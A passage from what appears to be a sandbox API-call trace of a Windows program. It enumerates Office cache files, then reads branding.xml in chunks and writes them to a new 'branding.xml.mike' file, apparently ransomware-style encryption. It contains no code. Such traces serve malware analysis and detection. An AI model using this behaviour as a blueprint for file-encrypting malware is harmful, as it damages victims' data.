lpFilePart=0x0) returned 0x3f [0040.935] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.957] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.957] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0040.958] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.959] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0040.960] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.960] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.960] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0040.960] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0040.960] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0040.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.961] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.999] GetFileType (hFile=0x264) returned 0x1 [0041.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.000] GetFileType (hFile=0x264) returned 0x1 [0041.000] CloseHandle (hObject=0x264) returned 1 [0041.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.000] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.000] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.000] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x21db1fc | out: lpFileInformation=0x21db1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.000] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x21db528 | out: lpFileInformation=0x21db528*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.001] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.001] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.002] GetFileType (hFile=0x264) returned 0x1 [0041.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.002] GetFileType (hFile=0x264) returned 0x1 [0041.002] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.002] WriteFile (in: hFile=0x264, lpBuffer=0x21dc418*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21dc418*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.003] CloseHandle (hObject=0x264) returned 1 [0041.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.003] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dbf00 | out: lpFileInformation=0x21dbf00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.003] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.003] GetFileType (hFile=0x264) returned 0x1 [0041.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.003] GetFileType (hFile=0x264) returned 0x1 [0041.003] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.004] ReadFile (in: hFile=0x264, lpBuffer=0x21dd54c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21dd54c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.005] CloseHandle (hObject=0x264) returned 1 [0041.007] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.007] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.007] GetFileType (hFile=0x264) returned 0x1 [0041.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.007] GetFileType (hFile=0x264) returned 0x1 [0041.007] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.007] WriteFile (in: hFile=0x264, lpBuffer=0x21e7ab4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21e7ab4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.007] CloseHandle (hObject=0x264) returned 1 [0041.008] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.008] GetFileType (hFile=0x264) returned 0x1 [0041.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.008] GetFileType (hFile=0x264) returned 0x1 [0041.008] SetFilePointer (in: hFile=0x264, 